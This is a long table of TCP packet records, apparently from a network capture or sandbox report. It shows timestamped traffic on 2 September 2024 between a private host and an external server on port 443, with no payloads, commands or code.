Sep 2, 2024 11:42:54.613614082 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613665104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613706112 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613753080 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613770008 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613770008 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613770008 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613770962 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613779068 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613790989 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613809109 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613812923 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613861084 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613866091 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.613914967 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.613967896 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614021063 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614022970 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614029884 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614069939 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614146948 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614192009 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614198923 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614202976 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614233017 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614243031 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614247084 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614276886 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614286900 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614332914 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614336967 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614346027 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614382982 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614387035 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614394903 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614404917 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614434958 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614439011 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614447117 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614484072 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614487886 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614510059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614590883 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614643097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614646912 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614654064 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614691019 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614695072 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614702940 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614748955 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614749908 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614758968 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614783049 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614794016 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614815950 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614820004 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614835978 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614875078 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614875078 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.614897013 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.614954948 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615014076 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615072012 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615113974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615153074 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615168095 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615170956 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615200996 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615220070 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615298033 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615348101 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615350008 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615358114 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615396023 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615403891 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615406990 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615438938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615451097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615453959 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615480900 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615503073 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615567923 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615609884 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615622997 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615626097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.615657091 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615674973 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615811110 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.615849972 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.700741053 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.700800896 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.700814009 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.700826883 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.700845003 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.700861931 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.700869083 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.700872898 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.700911045 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.700915098 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.700959921 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.700963974 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.700980902 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701005936 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701009989 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701025963 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701033115 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701071024 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701073885 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701081038 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701117992 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701134920 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701176882 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701181889 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701185942 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701217890 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701224089 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701237917 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701263905 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701281071 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701750040 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701796055 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701805115 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701848984 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701852083 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701858044 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701894045 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.701900005 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.701946020 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.702030897 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702078104 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702080011 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.702086926 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702121019 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.702137947 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702188015 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.702810049 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702851057 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702861071 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.702864885 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702907085 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.702912092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702922106 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702958107 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.702970982 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.702975035 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703001976 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703005075 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703043938 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703046083 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703056097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703088045 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703121901 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703170061 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703171968 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703181982 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703219891 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703233957 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703290939 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703318119 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703365088 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703367949 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703387022 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703421116 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703444004 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703474998 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703478098 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703485966 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703486919 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703528881 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703531981 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703540087 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703583002 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703587055 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703594923 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703646898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.703649998 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.703686953 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.704344988 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.704401016 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.785152912 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785202980 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785279036 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785366058 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785367012 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.785377026 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785422087 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785464048 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785528898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.785528898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.785528898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.785537958 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785653114 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785703897 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.785712957 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785723925 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785763025 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.785765886 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785777092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785815001 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.785828114 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.785877943 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.785980940 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786034107 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.786053896 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786106110 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.786108971 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786120892 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786156893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786165953 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.786170006 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786205053 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.786226034 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786262035 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786276102 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.786279917 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786323071 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.786421061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786464930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786473036 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.786477089 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786509991 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.786927938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786971092 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.786978960 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.786982059 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787018061 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787297010 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787348986 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787406921 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787456036 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787552118 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787599087 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787597895 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787615061 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787651062 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787663937 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787719011 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787738085 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787740946 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787766933 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787767887 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787786007 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787789106 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787817001 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787818909 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787862062 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787863970 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787874937 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787909031 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787925005 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.787929058 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.787965059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.788023949 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.789127111 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.789161921 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.789182901 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.789186001 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.789211035 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.789231062 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.790824890 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869323969 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869385958 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869436979 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869482040 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869518042 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869580030 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869580030 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869580030 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869580030 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869584084 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869595051 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869636059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869636059 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869649887 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869735956 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869786024 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869787931 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869796038 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.869832039 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.869956970 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870007038 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870007992 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870017052 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870054960 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870259047 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870306015 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870322943 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870368004 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870443106 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870479107 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870487928 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870493889 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870524883 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870534897 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870565891 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870610952 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870610952 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870620966 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870656013 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870676041 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870718002 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870722055 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.870727062 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.870757103 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.871063948 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871113062 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.871124029 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871174097 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.871715069 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871761084 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871764898 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.871771097 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871819019 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.871824026 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871867895 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871876001 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.871880054 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871907949 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.871911049 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871922016 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.871928930 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.871956110 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.871972084 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872013092 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872015953 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872031927 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872057915 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872061014 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872075081 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872081995 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872124910 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:54.872127056 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:54.872137070 CEST	443	49763	191.96.144.157	192.168.2.4
